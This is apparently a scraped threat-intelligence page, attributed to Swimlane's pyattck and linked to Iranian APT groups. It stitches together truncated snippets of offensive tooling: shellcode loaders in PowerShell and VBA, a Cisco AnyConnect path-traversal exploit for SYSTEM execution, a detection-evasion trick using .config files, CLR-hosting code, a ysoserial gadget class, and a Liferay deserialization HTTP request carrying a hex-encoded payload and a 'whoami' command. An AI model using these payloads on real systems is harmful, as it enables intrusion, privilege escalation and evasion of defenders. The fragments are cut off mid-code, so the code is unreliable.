The following content is generated using a preview release of Swimlane's pyattck.
This snippet of data is scoped to the following actor groups:
- APT33
- APT34
- APT39
- Charming Kitten
| <# | |
| https://raw.githubusercontent.com/rasta-mouse/TikiTorch/master/Get-CompressedShellcode.ps1 | |
| #> | |
| function Get-CompressedShellcode | |
| { | |
| [CmdletBinding()] | |
| Param([String]$inFile,[String]$outFile) | |
| $byteArray = [System.IO.File]::ReadAllBytes($inFile) | |
| Write-Verbose "Get-CompressedByteArray" |
| ' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb | |
| Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long | |
| Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr) | |
| Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr | |
| #If Win64 Then | |
| Const LS As LongPtr = 8& | |
| #Else | |
| Const LS As LongPtr = 4& |
The following content is generated using a preview release of Swimlane's pyattck.
This snippet of data is scoped to the following actor groups:
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace BlockDllTest | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { |
Collection of BloodHound Cypher Query Examples
| <# | |
| .Synopsis | |
| This module exploits a path traversal vulnerability in vpndownloader.exe of the Cisco AnyConnect client for Windows | |
| .Description | |
| This module exploits a path traversal vulnerability in vpndownloader.exe of the Cisco AnyConnect client for Windows. | |
| When the -Command argument isn't provided a DLL is created at C:\Program Files\Common Files\microsoft shared\ink\HID.dll. | |
| This DLL is used by the On-Screen Keyboard (osk.exe) of Windows, which is exposed on the login/lock screen. | |
| Opening the On-Screen Keyboard on this screen will run our DLL with LocalSystem privileges. |
We can do this by experimenting with .config files.
Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name
In this example, we don't have to rename anything. We simple coerce a trusted signed app to load our Assembly.
We do this by directing the application to read a config file we provide.
| #include <stdio.h> | |
| #include <Windows.h> | |
| #include <MSCorEE.h> | |
| #include <MetaHost.h> | |
| #include <evntprov.h> | |
| int main() | |
| { | |
| ICLRMetaHost* metaHost = NULL; | |
| IEnumUnknown* runtime = NULL; |
| package ysoserial.payloads; | |
| import com.mchange.lang.ByteUtils; | |
| import org.apache.commons.collections.Transformer; | |
| import org.apache.commons.collections.functors.ChainedTransformer; | |
| import org.apache.commons.collections.functors.ConstantTransformer; | |
| import org.apache.commons.collections.functors.InvokerTransformer; | |
| import org.apache.commons.collections.keyvalue.TiedMapEntry; | |
| import org.apache.commons.collections.map.LazyMap; | |
| import ysoserial.payloads.annotation.Authors; |
| POST /api/jsonws/invoke HTTP/1.1 | |
| Host: <Host> | |
| Connection: close | |
| cmd2: whoami | |
| Content-Type: application/x-www-form-urlencoded | |
| Content-Length: 4912 | |
| cmd={"/expandocolumn/update-column":{}}&p_auth=<valid token>&formDate=<date>&columnId=123&name=asdasd&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73 |